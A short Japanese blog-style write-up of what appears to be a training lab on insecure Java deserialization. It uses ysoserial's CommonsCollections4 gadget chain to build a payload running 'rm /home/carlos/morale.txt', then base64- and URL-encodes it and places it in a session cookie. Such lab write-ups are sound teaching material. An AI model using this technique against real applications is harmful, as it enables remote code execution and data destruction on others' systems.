Hello there, ('ω')ノ
ApacheCommonsを使用したJavaデシリアライズの活用を。
ソースコードにアクセスすることはできないものの。
構築済みのガジェットチェーンを使用できるとのことで。
まずは、ログインして。
下記より安全でないJavaオブジェクトの逆シリアル化を悪用して。
ペイロードを生成するためのツールを。
https://github.com/frohoff/ysoserial
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
基本的な使用方法は以下の通りなので。
java -jar ysoserial.jar [payload] ' [command] '
CommonsCollections4を使って、ファイルを削除するコマンドを実行するようにして。
これでペイロードを含むBase64でエンコードされ。
シリアル化されたオブジェクトが生成されて。
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
最後にURLエンコードして。
再度、ページをリロードして。
シリアル化されたJavaオブジェクトが含まれているCookieを置き換えて実行すると。
クリアできた。
Best regards, (^^ゞ
